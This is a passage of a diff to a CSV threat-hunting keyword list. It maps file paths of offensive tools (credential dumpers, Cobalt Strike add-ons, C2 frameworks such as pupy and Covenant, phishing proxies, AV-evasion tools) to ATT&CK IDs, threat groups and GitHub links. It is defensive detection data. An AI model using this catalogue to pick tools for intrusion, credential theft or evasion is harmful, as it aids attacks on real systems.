pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimipenguin.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/mimipenguin.c*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*/mimipenguin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/mimipenguin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/mimipenguin/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*/mimipenguin/*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" 
-"*/mimipy.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/mimipy.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/mimishim/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/minidump.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/minimal_elf.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" -"*/mirai_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/mirai_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/Misc/donut.exe*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" -"*/mitmAP*","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","1619","282","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z" +"*/mitmAP*","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","1620","282","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z" "*/mmouse-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mmouse-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mockingjay_BOF.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*/modbus-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Models/PowerShellLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Models/Regsvr32Launcher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Models/ShellCodeLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Modlishka.git*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. 
both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*/Models/PowerShellLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Models/Regsvr32Launcher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Models/ShellCodeLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Modlishka.git*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. 
which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" "*/module/darkexe/*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"*/Modules/Exitservice/uinit.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*/modules/payload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/Modules/Exitservice/uinit.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/modules/payload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/mongodb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mongodb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mongodb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/monkey.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*/monkey_island.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/monkey.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/monkey_island.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/MonkeyWorks.git*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*/mouselogger.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/mouselogger.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/mqtt-subscribe.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
